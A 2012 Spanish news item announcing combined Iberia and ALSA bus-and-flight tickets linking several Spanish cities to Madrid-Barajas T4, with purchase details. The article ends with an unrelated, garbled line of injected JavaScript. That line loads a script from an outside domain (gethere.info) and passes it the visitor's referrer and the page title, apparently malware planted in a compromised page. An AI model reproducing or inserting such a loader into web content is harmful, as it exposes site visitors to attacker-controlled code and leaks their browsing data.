Bus & Fly: ya a la venta los billetes combinados de Iberia y ALSA

15/06/2012

Este servicio permite trasladar, conjuntamente, a pasajeros desde distintas provincias españolas hasta la T4 de Madrid-Barajas, para que conecten con los destinos internacionales de Iberia. De la misma manera que pasajeros que vienen a España desde destinos internacionales, podrán llegar hasta su destino final de manera más cómoda y haciendo una única compra.

¿Dónde puedo contratar este servicio?

Los billetes pueden comprarse en cualquiera de los canales habituales de distribución de Iberia*, o en agencias de viajes y, en ellos, aparecerán reflejados todos los trayectos que realice el pasajero, tanto el tramo vía terrestre que se efectúa con Alsa, como el tramo internacional, vía aérea, que se realiza con Iberia. Se han establecido unos horarios combinados entre autobús y avión que están perfectamente calculados para que el pasajero disponga del tiempo suficiente para facturar o recoger su equipaje en el aeropuerto, pasar los controles de seguridad y tomar su conexión.

En una primera fase, este servicio, conecta Burgos, Soria, Valladolid, Albacete y Lorca con la red internacional de Iberia, lo que supone para todas estas ciudades mayor presencia internacional y un acceso a nuevos mercados, pues ahora también se comercializan como destinos aéreos. Es más, para todas las estaciones de autobús de estas ciudades desde donde parten y llegan autobuses de la empresa ALSA, IATA (Asociación Internacional de Transporte Aéreo) ha creado códigos específicos para su identificación. Además, se espera que en un futuro próximo esta red de ciudades se amplíe con más destinos nacionales e, incluso, también con otros internacionales, donde Iberia y ALSA tienen presencia.

*De igual forma que se adquiere un billete de avión, a través del teléfono de Serviberia 902 400 500 o en los teléfonos de reservas de cada país (la adquisición de estos billetes no es posible en Perú) y próximamente en iberia.com.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;